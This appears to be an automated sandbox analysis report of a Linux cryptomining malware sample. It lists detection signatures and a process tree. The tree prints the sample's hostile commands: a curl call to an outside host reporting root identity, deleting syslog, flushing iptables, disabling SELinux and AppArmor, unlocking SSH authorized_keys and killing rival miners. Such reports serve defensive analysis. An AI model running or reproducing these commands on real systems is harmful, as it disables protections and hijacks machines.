71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad

Analysis

max time kernel
150s
max time network
136s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
07-03-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b84ec8d2286ecb64f4164633be39421b
Size

60KB
MD5

b84ec8d2286ecb64f4164633be39421b
SHA1

7b09fb48eefb27acadf53aed331a24211ce78a72
SHA256

71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad
SHA512

f31cbcf9b8a6e935f8ca8341aac462c059a1c08ddeba4986fbd7d2224917bdbaad21d1fb0dfb437b9385998c74e856c36387e7785018f4bea8cc4a217ce87844
SSDEEP

1536:/F2cc2/ndOQvL0KKGdAkKFOmm5air0TI9:/F2ccQh2v47ccyI9

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

ioc	pid	Process
/usr/bin/tntrecht	2397	Process not Found

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
771	iptables

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	b84ec8d2286ecb64f4164633be39421b

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1675	xargs
1983	Process not Found
1112	xargs
1464	xargs
1729	xargs
1992	Process not Found
2300	Process not Found
905	xargs
1487	xargs
1647	xargs
1713	xargs
2135	Process not Found
1975	Process not Found
1995	Process not Found
2143	Process not Found
1089	xargs
1237	xargs
1350	xargs
1434	xargs
1683	xargs
1284	xargs
1304	xargs
1440	xargs
1663	xargs
1681	xargs
1994	Process not Found
1182	xargs
1423	xargs
1470	xargs
1556	xargs
1566	xargs
767	chattr
1687	xargs
1693	xargs
2046	Process not Found
1102	xargs
1691	xargs
1986	Process not Found
2018	Process not Found
2058	Process not Found
1993	Process not Found
2066	Process not Found
2298	Process not Found
825	chattr
1019	xargs
1117	xargs
1361	xargs
1743	xargs
1309	xargs
1671	xargs
1717	xargs
2010	Process not Found
2050	Process not Found
942	xargs
1152	xargs
1529	xargs
1576	xargs
2026	Process not Found
833	grep
1711	xargs
2054	Process not Found
2296	Process not Found
2316	Process not Found
1679	xargs

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/etc/crontab	Process not Found

Disables AppArmor 64 IoCs

Disables AppArmor security module.

pid	Process
842	systemctl
868	systemctl
873	systemctl
2118	Process not Found
2119	Process not Found
2124	Process not Found
2340	Process not Found
842	systemctl
871	systemctl
882	systemctl
2102	Process not Found
2103	Process not Found
2091	Process not Found
2107	Process not Found
2127	Process not Found
2111	Process not Found
877	systemctl
2096	Process not Found
2091	Process not Found
842	systemctl
863	systemctl
863	systemctl
2109	Process not Found
2121	Process not Found
2125	Process not Found
2111	Process not Found
2111	Process not Found
842	systemctl
2114	Process not Found
2120	Process not Found
842	systemctl
2098	Process not Found
2101	Process not Found
2105	Process not Found
2111	Process not Found
874	systemctl
863	systemctl
2123	Process not Found
2128	Process not Found
2130	Process not Found
875	systemctl
878	systemctl
2129	Process not Found
876	systemctl
863	systemctl
863	systemctl
2091	Process not Found
2091	Process not Found
881	systemctl
842	systemctl
866	systemctl
879	systemctl
863	systemctl
2100	Process not Found
2108	Process not Found
2110	Process not Found
862	systemctl
870	systemctl
880	systemctl
2091	Process not Found
2091	Process not Found
2116	Process not Found
2111	Process not Found
2104	Process not Found

Disables SELinux 10 IoCs

Disables SELinux security module.

pid	Process
841	setenforce
1160	grep
1594	grep
1009	kill
1009	kill
1009	kill
1272	grep
1009	kill
1009	kill
1009	kill

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill

Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/usr/bin/tntrecht	Process not Found

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/431/cmdline	ps
File opened for reading	/proc/686/cmdline	pgrep
File opened for reading	/proc/14/cmdline	pgrep
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/382/stat	ps
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/3/cmdline	pgrep
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/249/status	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/74/cmdline	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/79/status	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/1704/status	pgrep
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/685/cmdline	pkill
File opened for reading	/proc/1135/cmdline	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/339/cmdline	ps
File opened for reading	/proc/383/status	ps
File opened for reading	/proc/23/stat	Process not Found
File opened for reading	/proc/69/status	ps
File opened for reading	/proc/679/stat	ps
File opened for reading	/proc/23/status	pgrep
File opened for reading	/proc/685/cmdline	pkill
File opened for reading	/proc/2/status	pkill
File opened for reading	/proc/79/status	pkill
File opened for reading	/proc/68/status	pkill
File opened for reading	/proc/385/status	ps
File opened for reading	/proc/7/cmdline	pgrep
File opened for reading	/proc/1425/stat	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/125/cmdline	ps
File opened for reading	/proc/686/status	pgrep
File opened for reading	/proc/filesystems	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/342/cmdline	pkill
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/385/status	ps
File opened for reading	/proc/708/status	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/708/status	ps
File opened for reading	/proc/708/cmdline	ps
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/160/stat	ps
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/160/cmdline	pgrep
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/332/stat	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/9/cmdline	pgrep
File opened for reading	/proc/69/cmdline	pkill

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/svcguard	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcworkmanager	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcupdates	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/kdevtmpfsi	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/redis2	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/newsvc.sh	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcupdate	b84ec8d2286ecb64f4164633be39421b

/tmp/b84ec8d2286ecb64f4164633be39421b
/tmp/b84ec8d2286ecb64f4164633be39421b
1⤵
- Writes DNS configuration
- Writes file to tmp directory
PID:708
- /usr/bin/id
  id
  2⤵
  PID:710
- /usr/bin/curl
  curl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"
  2⤵
  PID:713
- /bin/mkdir
  mkdir /var/tmp/.system -p
  2⤵
  PID:764
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:766
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:767
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:768
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:771
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:775
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:823
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:824
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:825
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:827
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:829
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:830
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:831
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:832
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:833
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:838
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:837
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:841
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:842
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:844
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:845
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:846
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:850
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:851
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:852
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:853
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:854
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:855
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:856
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:857
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:858
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:859
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:860
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:861
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:842
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:842
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:842
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:842
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:842
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:842
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:862
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:863
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:864
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:865
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:866
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:870
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:871
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:872
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:873
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:874
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:875
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:876
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:877
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:878
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:879
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:880
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:881
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:863
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:863
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:863
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:863
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:863
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:863
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:882
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:884
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:885
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:886
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:887
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:891
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:890
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:889
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:892
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:897
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:896
- /bin/grep
  grep :443
  2⤵
  PID:895
- /bin/grep
  grep -v -
  2⤵
  PID:898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:899
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:903
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:902
- /bin/grep
  grep -v -
  2⤵
  PID:904
- /bin/grep
  grep :23
  2⤵
  PID:901
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:905
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:908
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:909
- /bin/grep
  grep -v -
  2⤵
  PID:910
- /bin/grep
  grep :443
  2⤵
  PID:907
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:911
- /bin/grep
  grep -v -
  2⤵
  PID:916
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:915
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:914
- /bin/grep
  grep :143
  2⤵
  PID:913
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:917
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:922
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:921
- /bin/grep
  grep -v -
  2⤵
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:924
- /bin/grep
  grep :2222
  2⤵
  PID:920
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:928
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:927
- /bin/grep
  grep -v -
  2⤵
  PID:929
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:930
- /bin/grep
  grep :3333
  2⤵
  PID:926
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:934
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:933
- /bin/grep
  grep -v -
  2⤵
  PID:935
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:936
- /bin/grep
  grep :3389
  2⤵
  PID:932
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:940
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:939
- /bin/grep
  grep -v -
  2⤵
  PID:941
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:942
- /bin/grep
  grep :5555
  2⤵
  PID:938
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:946
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:945
- /bin/grep
  grep -v -
  2⤵
  PID:947
- /bin/grep
  grep :6666
  2⤵
  PID:944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:948
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:952
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:951
- /bin/grep
  grep -v -
  2⤵
  PID:953
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:954
- /bin/grep
  grep :6665
  2⤵
  PID:950
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:958
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:957
- /bin/grep
  grep -v -
  2⤵
  PID:959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:960
- /bin/grep
  grep :6667
  2⤵
  PID:956
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:964
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:963
- /bin/grep
  grep -v -
  2⤵
  PID:965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:966
- /bin/grep
  grep :7777
  2⤵
  PID:962
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:970
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:969
- /bin/grep
  grep -v -
  2⤵
  PID:971
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:972
- /bin/grep
  grep :8444
  2⤵
  PID:968
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:976
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:975
- /bin/grep
  grep -v -
  2⤵
  PID:977
- /bin/grep
  grep :3347
  2⤵
  PID:974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:978
- /bin/grep
  grep :3333
  2⤵
  PID:981
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:982
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:983
- /bin/grep
  grep -v grep
  2⤵
  PID:980
- /bin/ps
  ps aux
  2⤵
  PID:979
- /bin/grep
  grep :5555
  2⤵
  PID:986
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:988
- /bin/grep
  grep -v grep
  2⤵
  PID:985
- /bin/ps
  ps aux
  2⤵
  PID:984
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:992
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:993
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:991
- /bin/grep
  grep -v grep
  2⤵
  PID:990
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:989
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:997
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:998
- /bin/grep
  grep log_
  2⤵
  PID:996
- /bin/grep
  grep -v grep
  2⤵
  PID:995
- /bin/ps
  ps aux
  2⤵
  PID:994
- /bin/grep
  grep systemten
  2⤵
  PID:1001
- /bin/ps
  ps aux
  2⤵
  PID:999
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1002
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1003
- /bin/grep
  grep -v grep
  2⤵
  PID:1000
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1007
- /bin/grep
  grep netns
  2⤵
  PID:1006
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1008
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1009
- - /usr/local/bin/kill
    kill -9 10
